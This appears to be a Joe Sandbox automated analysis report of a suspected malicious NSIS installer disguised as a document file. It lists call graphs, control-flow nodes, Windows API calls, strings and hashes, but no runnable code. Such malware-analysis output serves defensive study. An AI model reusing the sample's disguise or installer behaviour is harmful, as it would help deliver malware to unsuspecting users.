404fe0 4592->4591 4597 405041 4592->4597 4598 405054 SendMessageW SendMessageW 4592->4598 4604 404a34 4593->4604 4594 404fca SendMessageW 4594->4592 4595->4592 4595->4594 4597->4598 4598->4592 4600 406072 18 API calls 4599->4600 4601 40411f SetDlgItemTextW 4600->4601 4601->4561 4602->4590 4603->4553 4621 40496b 4604->4621 4606 404a49 4606->4567 4608 404193 GetWindowLongW 4607->4608 4618 40421c 4607->4618 4609 4041a4 4608->4609 4608->4618 4610 4041b3 GetSysColor 4609->4610 4611 4041b6 4609->4611 4610->4611 4612 4041c6 SetBkMode 4611->4612 4613 4041bc SetTextColor 4611->4613 4614 4041e4 4612->4614 4615 4041de GetSysColor 4612->4615 4613->4612 4616 4041f5 4614->4616 4617 4041eb SetBkColor 4614->4617 4615->4614 4616->4618 4619 404208 DeleteObject 4616->4619 4620 40420f CreateBrushIndirect 4616->4620 4617->4616 4619->4620 4620->4618 4622 404984 4621->4622 4623 406072 18 API calls 4622->4623 4624 4049e8 4623->4624 4625 406072 18 API calls 4624->4625 4626 4049f3 4625->4626 4627 406072 18 API calls 4626->4627 4628 404a09 lstrlenW wsprintfW SetDlgItemTextW 4627->4628 4628->4606 5328 40172d 5329 402bbf 18 API calls 5328->5329 5330 401734 SearchPathW 5329->5330 5331 40174f 5330->5331 5332 4045af 5333 4045db 5332->5333 5334 4045ec 5332->5334 5393 405779 GetDlgItemTextW 5333->5393 5336 4045f8 GetDlgItem 5334->5336 5339 404657 5334->5339 5338 40460c 5336->5338 5337 4045e6 5340 4062e4 5 API calls 5337->5340 5342 404620 SetWindowTextW 5338->5342 5347 405aaf 4 API calls 5338->5347 5343 406072 18 API calls 5339->5343 5354 40473b 5339->5354 5391 4048ea 5339->5391 5340->5334 5345 404114 19 API calls 5342->5345 5348 4046cb SHBrowseForFolderW 5343->5348 5344 40476b 5349 405b0c 18 API calls 5344->5349 5350 40463c 5345->5350 5346 40417b 8 API calls 5351 4048fe 5346->5351 5352 404616 5347->5352 5353 4046e3 CoTaskMemFree 5348->5353 5348->5354 5355 404771 5349->5355 5356 404114 19 API calls 5350->5356 5352->5342 5357 405a04 3 API calls 5352->5357 5358 405a04 3 API calls 5353->5358 5354->5391 5395 405779 GetDlgItemTextW 5354->5395 5396 406050 lstrcpynW 5355->5396 5359 40464a 5356->5359 5357->5342 5360 4046f0 5358->5360 5394 404149 SendMessageW 5359->5394 5363 404727 SetDlgItemTextW 5360->5363 5368 406072 18 API calls 5360->5368 5363->5354 5364 404650 5366 40642a 5 API calls 5364->5366 5365 404788 5367 40642a 5 API calls 5365->5367 5366->5339 5375 40478f 5367->5375 5369 40470f lstrcmpiW 5368->5369 5369->5363 5372 404720 lstrcatW 5369->5372 5370 4047d0 5397 406050 lstrcpynW 5370->5397 5372->5363 5373 4047d7 5374 405aaf 4 API calls 5373->5374 5376 4047dd GetDiskFreeSpaceW 5374->5376 5375->5370 5378 405a50 2 API calls 5375->5378 5380 404828 5375->5380 5379 404801 MulDiv 5376->5379 5376->5380 5378->5375 5379->5380 5381 404899 5380->5381 5382 404a34 21 API calls 5380->5382 5383 4048bc 5381->5383 5385 40140b 2 API calls 5381->5385 5384 404886 5382->5384 5398 404136 EnableWindow 5383->5398 5387 40489b SetDlgItemTextW 5384->5387 5388 40488b 5384->5388 5385->5383 5387->5381 5390 40496b 21 API calls 5388->5390 5389 4048d8 5389->5391 5399 404544 5389->5399 5390->5381 5391->5346 5393->5337 5394->5364 5395->5344 5396->5365 5397->5373 5398->5389 5400 404552 5399->5400 5401 404557 SendMessageW 5399->5401 5400->5401 5401->5391 5402 4042b1 5403 4042c9 5402->5403 5407 4043e3 5402->5407 5408 404114 19 API calls 5403->5408 5404 40444d 5405 40451f 5404->5405 5406 404457 GetDlgItem 5404->5406 5413 40417b 8 API calls 5405->5413 5409 4044e0 5406->5409 5410 404471 5406->5410 5407->5404 5407->5405 5411 40441e GetDlgItem SendMessageW 5407->5411 5412 404330 5408->5412 5409->5405 5418 4044f2 5409->5418 5410->5409 5417 404497 6 API calls 5410->5417 5433 404136 EnableWindow 5411->5433 5415 404114 19 API calls 5412->5415 5416 40451a 5413->5416 5420 40433d CheckDlgButton 5415->5420 5417->5409 5421 404508 5418->5421 5422 4044f8 SendMessageW 5418->5422 5419 404448 5424 404544 SendMessageW 5419->5424 5431 404136 EnableWindow 5420->5431 5421->5416 5423 40450e SendMessageW 5421->5423 5422->5421 5423->5416 5424->5404 5426 40435b GetDlgItem 5432 404149 SendMessageW 5426->5432 5428 404371 SendMessageW 5429 404397 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5428->5429 5430 40438e GetSysColor 5428->5430 5429->5416 5430->5429 5431->5426 5432->5428 5433->5419 5434 4027b4 5435 4027ba 5434->5435 5436 4027c2 FindClose 5435->5436 5437 402a4c 5435->5437 5436->5437 4635 401b37 4636 401b44 4635->4636 4637 401b88 4635->4637 4638 401bcd 4636->4638 4645 401b5b 4636->4645 4639 401bb2 GlobalAlloc 4637->4639 4640 401b8d 4637->4640 4642 406072 18 API calls 4638->4642 4650 402288 4638->4650 4641 406072 18 API calls 4639->4641 4640->4650 4656 406050 lstrcpynW 4640->4656 4641->4638 4644 402282 4642->4644 4648 405795 MessageBoxIndirectW 4644->4648 4654 406050 lstrcpynW 4645->4654 4646 401b9f GlobalFree 4646->4650 4648->4650 4649 401b6a 4655 406050 lstrcpynW 4649->4655 4652 401b79 4657 406050 lstrcpynW 4652->4657 4654->4649 4655->4652 4656->4646 4657->4650 5438 402537 5439 402562 5438->5439 5440 40254b 5438->5440 5442 402596 5439->5442 5443 402567 5439->5443 5441 402ba2 18 API calls 5440->5441 5446 402552 5441->5446 5445 402bbf 18 API calls 5442->5445 5444 402bbf 18 API calls 5443->5444 5447 40256e WideCharToMultiByte lstrlenA 5444->5447 5448 40259d lstrlenW 5445->5448 5449 4025ca 5446->5449 5451 405d06 5 API calls 5446->5451 5452 4025e0 5446->5452 5447->5446 5448->5446 5450 405cd7 WriteFile 5449->5450 5449->5452 5450->5452 5451->5449 5453 4014b8 5454 4014be 5453->5454 5455 401389 2 API calls 5454->5455 5456 4014c6 5455->5456 4682 4015b9 4683 402bbf 18 API calls 4682->4683 4684 4015c0 4683->4684 4685 405aaf 4 API calls 4684->4685 4698 4015c9 4685->4698 4686 401629 4688 40165b 4686->4688 4689 40162e 4686->4689 4687 405a31 CharNextW 4687->4698 4691 401423 25 API calls 4688->4691 4690 401423 25 API calls 4689->4690 4692 401635 4690->4692 4697 401653 4691->4697 4701 406050 lstrcpynW 4692->4701 4693 4056fb 2 API calls 4693->4698 4695 405718 5 API calls 4695->4698 4696 401642 SetCurrentDirectoryW 4696->4697 4698->4686 4698->4687 4698->4693 4698->4695 4699 40160f GetFileAttributesW 4698->4699 4700 40567e 4 API calls 4698->4700 4699->4698 4700->4698 4701->4696 5457 40293b 5458 402ba2 18 API calls 5457->5458 5459 402941 5458->5459 5460 402964 5459->5460 5461 40297d 5459->5461 5469 40281e 5459->5469 5465 402969 5460->5465 5466 40297a 5460->5466 5462 402993 5461->5462 5463 402987 5461->5463 5464 406072 18 API calls 5462->5464 5467 402ba2 18 API calls 5463->5467 5464->5469 5471 406050 lstrcpynW 5465->5471 5472 405f97 wsprintfW 5466->5472 5467->5469 5471->5469 5472->5469 4719 403c3c 4720 403c54 4719->4720 4721 403d8f 4719->4721 4720->4721 4722 403c60 4720->4722 4723 403da0 GetDlgItem GetDlgItem 4721->4723 4724 403de0 4721->4724 4726 403c6b SetWindowPos 4722->4726 4727 403c7e 4722->4727 4728 404114 19 API calls 4723->4728 4725 403e3a 4724->4725 4733 401389 2 API calls 4724->4733 4729 404160 SendMessageW 4725->4729 4750 403d8a 4725->4750 4726->4727 4730 403c83 ShowWindow 4727->4730 4731 403c9b 4727->4731 4732 403dca SetClassLongW 4728->4732 4758 403e4c 4729->4758 4730->4731 4734 403ca3 DestroyWindow 4731->4734 4735 403cbd 4731->4735 4736 40140b 2 API calls 4732->4736 4739 403e12 4733->4739 4740 4040be 4734->4740 4737 403cc2 SetWindowLongW 4735->4737 4738 403cd3 4735->4738 4736->4724 4737->4750 4741 403d7c 4738->4741 4742 403cdf GetDlgItem 4738->4742 4739->4725 4743 403e16 SendMessageW 4739->4743 4749 4040ce ShowWindow 4740->4749 4740->4750 4748 40417b 8 API calls 4741->4748 4746 403cf2 SendMessageW IsWindowEnabled 4742->4746 4747 403d0f 4742->4747 4743->4750 4744 40140b 2 API calls 4744->4758 4745 40409f DestroyWindow EndDialog 4745->4740 4746->4747 4746->4750 4752 403d1c 4747->4752 4755 403d63 SendMessageW 4747->4755 4756 403d2f 4747->4756 4764 403d14 4747->4764 4748->4750 4749->4750 4751 406072 18 API calls 4751->4758 4752->4755 4752->4764 4754 404114 19 API calls 4754->4758 4755->4741 4759 403d37 4756->4759 4760 403d4c 4756->4760 4757 403d4a 4757->4741 4758->4744 4758->4745 4758->4750 4758->4751 4758->4754 4765 404114 19 API calls 4758->4765 4780 403fdf DestroyWindow 4758->4780 4762 40140b 2 API calls 4759->4762 4761 40140b 2 API calls 4760->4761 4763 403d53 4761->4763 4762->4764 4763->4741 4763->4764 4793 4040ed 4764->4793 4766 403ec7 GetDlgItem 4765->4766 4767 403ee4 ShowWindow KiUserCallbackDispatcher 4766->4767 4768 403edc 4766->4768 4790 404136 EnableWindow 4767->4790 4768->4767 4770 403f0e EnableWindow 4773 403f22 4770->4773 4771 403f27 GetSystemMenu EnableMenuItem SendMessageW 4772 403f57 SendMessageW 4771->4772 4771->4773 4772->4773 4773->4771 4791 404149 SendMessageW 4773->4791 4792 406050 lstrcpynW 4773->4792 4776 403f85 lstrlenW 4777 406072 18 API calls 4776->4777 4778 403f9b SetWindowTextW 4777->4778 4779 401389 2 API calls 4778->4779 4779->4758 4780->4740 4781 403ff9 CreateDialogParamW 4780->4781 4781->4740 4782 40402c 4781->4782 4783 404114 19 API calls 4782->4783 4784 404037 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4783->4784 4785 401389 2 API calls 4784->4785 4786 40407d 4785->4786 4786->4750 4787 404085 ShowWindow 4786->4787 4788 404160 SendMessageW 4787->4788 4789 40409d 4788->4789 4789->4740 4790->4770 4791->4773 4792->4776 4794 4040f4 4793->4794 4795 4040fa SendMessageW 4793->4795 4794->4795 4795->4757 5473 10002a7f 5474 10002a97 5473->5474 5475 1000158f 2 API calls 5474->5475 5476 10002ab2 5475->5476

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 0 4032a0-4032d3 SetErrorMode GetVersion 1 4032d5-4032dd call 40642a 0->1 2 4032e6 0->2 1->2 8 4032df 1->8 4 4032eb-4032ff call 4063ba lstrlenA 2->4 9 403301-403375 call 40642a * 2 #17 OleInitialize SHGetFileInfoW call 406050 GetCommandLineW call 406050 GetModuleHandleW 4->9 8->2 18 403377-40337e 9->18 19 40337f-403399 call 405a31 CharNextW 9->19 18->19 22 4034b0-4034ca GetTempPathW call 40326f 19->22 23 40339f-4033a5 19->23 32 403522-40353c DeleteFileW call 402dee 22->32 33 4034cc-4034ea GetWindowsDirectoryW lstrcatW call 40326f 22->33 25 4033a7-4033ac 23->25 26 4033ae-4033b2 23->26 25->25 25->26 27 4033b4-4033b8 26->27 28 4033b9-4033bd 26->28 27->28 30 4033c3-4033c9 28->30 31 40347c-403489 call 405a31 28->31 35 4033e4-40341d 30->35 36 4033cb-4033d3 30->36 46 40348b-40348c 31->46 47 40348d-403493 31->47 48 403542-403548 32->48 49 4035ed-4035fd call 4037bf OleUninitialize 32->49 33->32 52 4034ec-40351c GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 33->52 43 40343a-403474 35->43 44 40341f-403424 35->44 41 4033d5-4033d8 36->41 42 4033da 36->42 41->35 41->42 42->35 43->31 51 403476-40347a 43->51 44->43 50 403426-40342e 44->50 46->47 47->23 53 403499 47->53 54 4035dd-4035e4 call 403899 48->54 55 40354e-403559 call 405a31 48->55 69 403723-403729 49->69 70 403603-403613 call 405795 ExitProcess 49->70 57 403430-403433 50->57 58 403435 50->58 51->31 59 40349b-4034a9 call 406050 51->59 52->32 52->49 61 4034ae 53->61 68 4035e9 54->68 73 4035a7-4035b1 55->73 74 40355b-403590 55->74 57->43 57->58 58->43 59->61 61->22 68->49 71 4037a7-4037af 69->71 72 40372b-403741 GetCurrentProcess OpenProcessToken 69->72 79 4037b1 71->79 80 4037b5-4037b9 ExitProcess 71->80 76 403743-403771 LookupPrivilegeValueW AdjustTokenPrivileges 72->76 77 403777-403785 call 40642a 72->77 81 4035b3-4035c1 call 405b0c 73->81 82 403619-40362d call 405718 lstrcatW 73->82 78 403592-403596 74->78 76->77 96 403793-40379e ExitWindowsEx 77->96 97 403787-403791 77->97 85 403598-40359d 78->85 86 40359f-4035a3 78->86 79->80 81->49 93 4035c3-4035d9 call 406050 * 2 81->93 94 40363a-403654 lstrcatW lstrcmpiW 82->94 95 40362f-403635 lstrcatW 82->95 85->86 91 4035a5 85->91 86->78 86->91 91->73 93->54 94->49 99 403656-403659 94->99 95->94 96->71 100 4037a0-4037a2 call 40140b 96->100 97->96 97->100 102 403662 call 4056fb 99->102 103 40365b-403660 call 40567e 99->103 100->71 111 403667-403675 SetCurrentDirectoryW 102->111 103->111 112 403682-4036ab call 406050 111->112 113 403677-40367d call 406050 111->113 117 4036b0-4036cc call 406072 DeleteFileW 112->117 113->112 120 40370d-403715 117->120 121 4036ce-4036de CopyFileW 117->121 120->117 123 403717-40371e call 405ef1 120->123 121->120 122 4036e0-403700 call 405ef1 call 406072 call 405730 121->122 122->120 132 403702-403709 CloseHandle 122->132 123->49 132->120
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE ref: 004032C3
                                                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 004032C9
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032F2
                                                                                                                                                                                                                          • #17.COMCTL32(00000007,00000009), ref: 00403315
                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040331C
                                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 00403338
                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(Bistandspengene Setup,NSIS Error), ref: 0040334D
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",00000000), ref: 00403360
                                                                                                                                                                                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",00000020), ref: 00403387
                                                                                                                                                                                                                            • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                                                                                                                                                            • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C1
                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D2
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034DE
                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F2
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FA
                                                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350B
                                                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403513
                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(1033), ref: 00403527
                                                                                                                                                                                                                            • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Bistandspengene Setup,NSIS Error), ref: 0040605D
                                                                                                                                                                                                                          • OleUninitialize.OLE32(?), ref: 004035F2
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403613
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403626
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403635
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403640
                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",00000000,?), ref: 0040364C
                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403668
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,?), ref: 004036C2
                                                                                                                                                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe,0042AA08,00000001), ref: 004036D6
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000), ref: 00403703
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403732
                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403739
                                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040374E
                                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403771
                                                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403796
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 004037B9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe"$.tmp$1033$Bistandspengene Setup$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114$C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\fusty$C:\Users\user\Desktop$C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                          • API String ID: 2488574733-4039575677
                                                                                                                                                                                                                          • Opcode ID: 26eb6f9b16d8ac2476929461e4c221b8d9deac311ccc6cd13137edb9e6a9c942
                                                                                                                                                                                                                          • Instruction ID: bc0dc6ca93ec9440221f6a1154d69e62cad873230aa3e7f423b6c7eed9202452
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26eb6f9b16d8ac2476929461e4c221b8d9deac311ccc6cd13137edb9e6a9c942
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60D1F470600300ABE710BF759D45B2B3AADEB8074AF51443FF581B62E1DB7D8A458B6E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 133 404b2b-404b77 GetDlgItem * 2 134 404d98-404d9f 133->134 135 404b7d-404c11 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 133->135 136 404da1-404db1 134->136 137 404db3 134->137 138 404c20-404c27 DeleteObject 135->138 139 404c13-404c1e SendMessageW 135->139 140 404db6-404dbf 136->140 137->140 141 404c29-404c31 138->141 139->138 142 404dc1-404dc4 140->142 143 404dca-404dd0 140->143 144 404c33-404c36 141->144 145 404c5a-404c5e 141->145 142->143 146 404eae-404eb5 142->146 149 404dd2-404dd9 143->149 150 404ddf-404de6 143->150 147 404c38 144->147 148 404c3b-404c58 call 406072 SendMessageW * 2 144->148 145->141 151 404c60-404c8c call 404114 * 2 145->151 152 404f26-404f2e 146->152 153 404eb7-404ebd 146->153 147->148 148->145 149->146 149->150 155 404de8-404deb 150->155 156 404e5b-404e5e 150->156 184 404c92-404c98 151->184 185 404d57-404d6a GetWindowLongW SetWindowLongW 151->185 161 404f30-404f36 SendMessageW 152->161 162 404f38-404f3f 152->162 158 404ec3-404ecd 153->158 159 40510e-405120 call 40417b 153->159 164 404df6-404e0b call 404a79 155->164 165 404ded-404df4 155->165 156->146 160 404e60-404e6a 156->160 158->159 167 404ed3-404ee2 SendMessageW 158->167 169 404e7a-404e84 160->169 170 404e6c-404e78 SendMessageW 160->170 161->162 171 404f41-404f48 162->171 172 404f73-404f7a 162->172 164->156 194 404e0d-404e1e 164->194 165->156 165->164 167->159 178 404ee8-404ef9 SendMessageW 167->178 169->146 180 404e86-404e90 169->180 170->169 181 404f51-404f58 171->181 182 404f4a-404f4b ImageList_Destroy 171->182 176 4050d0-4050d7 172->176 177 404f80-404f8c call 4011ef 172->177 176->159 189 4050d9-4050e0 176->189 205 404f9c-404f9f 177->205 206 404f8e-404f91 177->206 187 404f03-404f05 178->187 188 404efb-404f01 178->188 190 404ea1-404eab 180->190 191 404e92-404e9f 180->191 192 404f61-404f6d 181->192 193 404f5a-404f5b GlobalFree 181->193 182->181 196 404c9b-404ca2 184->196 200 404d70-404d74 185->200 198 404f06-404f1f call 401299 SendMessageW 187->198 188->187 188->198 189->159 199 4050e2-40510c ShowWindow GetDlgItem ShowWindow 189->199 190->146 191->146 192->172 193->192 194->156 195 404e20-404e22 194->195 201 404e24-404e2b 195->201 202 404e35 195->202 203 404d38-404d4b 196->203 204 404ca8-404cd0 196->204 198->152 199->159 208 404d76-404d89 ShowWindow call 404149 200->208 209 404d8e-404d96 call 404149 200->209 211 404e31-404e33 201->211 212 404e2d-404e2f 201->212 215 404e38-404e54 call 40117d 202->215 203->196 219 404d51-404d55 203->219 213 404cd2-404d08 SendMessageW 204->213 214 404d0a-404d0c 204->214 220 404fe0-405004 call 4011ef 205->220 221 404fa1-404fba call 4012e2 call 401299 205->221 216 404f93 206->216 217 404f94-404f97 call 404af9 206->217 208->159 209->134 211->215 212->215 213->203 223 404d0e-404d1d SendMessageW 214->223 224 404d1f-404d35 SendMessageW 214->224 215->156 216->217 217->205 219->185 219->200 235 4050a6-4050ba InvalidateRect 220->235 236 40500a 220->236 241 404fca-404fd9 SendMessageW 221->241 242 404fbc-404fc2 221->242 223->203 224->203 235->176 237 4050bc-4050cb call 404a4c call 404a34 235->237 238 40500d-405018 236->238 237->176 243 40501a-405029 238->243 244 40508e-4050a0 238->244 241->220 245 404fc4 242->245 246 404fc5-404fc8 242->246 248 40502b-405038 243->248 249 40503c-40503f 243->249 244->235 244->238 245->246 246->241 246->242 248->249 251 405041-405044 249->251 252 405046-40504f 249->252 253 405054-40508c SendMessageW * 2 251->253 252->253 254 405051 252->254 253->244 254->253
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B43
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404B4E
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B98
                                                                                                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404BAB
                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,00405123), ref: 00404BC4
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BD8
                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEA
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C00
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C0C
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C1E
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404C21
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C4C
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C58
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CEE
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D19
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D2D
                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404D5C
                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6A
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404D7B
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E78
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EDD
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF2
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F16
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F36
                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F4B
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404F5B
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD4
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 0040507D
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040508C
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004050AC
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004050FA
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405105
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040510C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
